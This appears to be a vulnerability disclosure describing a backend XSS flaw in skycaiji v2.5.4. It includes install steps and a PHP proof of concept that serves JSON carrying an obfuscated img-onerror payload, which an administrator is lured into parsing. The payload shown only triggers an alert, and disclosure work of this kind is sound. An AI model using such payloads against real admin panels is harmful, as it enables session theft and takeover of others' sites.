skycaiji-v2.5.4 has a backend xss vulnerability

  1. skycaiji-v2.5.4 has a backend xss vulnerability

skycaiji-v2.5.4 has a backend xss vulnerability

Firstly, you can download the source code from the following website

https://down.chinaz.com/api/index/download?id=38972&type=code

Directly place it in the root directory of the website, access the server IP, and follow the prompts to install

After installation, log in to the backend.

image-20230502232501330

Click to the above function point

This is a JSON parsing function, but there is no complete xss protection in place.

We can construct a file that returns the JSON format ourselves, then access it, and return it to the JSON format with xss to trigger the xss code in the background.

<?php
$data = array(
    'name' => 'John  <img src=\'x\' onerror=\"eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))\">',
    'age' => 30,
    'email' => 'johndoe@example.com',
);
 
$json = json_encode($data);
 
header('Content-type: application/json');
echo $json;

This string of code will return a JSON data with malicious payload.

We will deploy it on our own VPS and induce the backend administrator to parse its data, and we will find that the successful triggering of the xss code

image-20230502232849580

image-20230502232855722

Attackers can use this vulnerability to do anything that JavaScript code can do


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。